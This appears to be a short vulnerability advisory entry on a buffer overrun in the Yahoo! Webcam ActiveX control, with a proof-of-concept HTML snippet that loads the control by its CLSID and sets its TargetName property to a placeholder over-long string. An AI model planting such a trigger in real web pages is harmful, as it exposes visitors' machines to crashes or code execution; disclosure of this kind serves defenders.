• info
• discussion
• exploit
• solution
• references

Yahoo! Webcam ActiveX Control Buffer Overrun Vulnerability

The following proof of concept example has been provided.

<object id="yahoowebcam"
classid="CLSID:E504EE6E-47C6-11D5-B8AB-00D0B78F3D48" >
</object>
<script>
yahoowebcam.TargetName="longstringhere";
</script>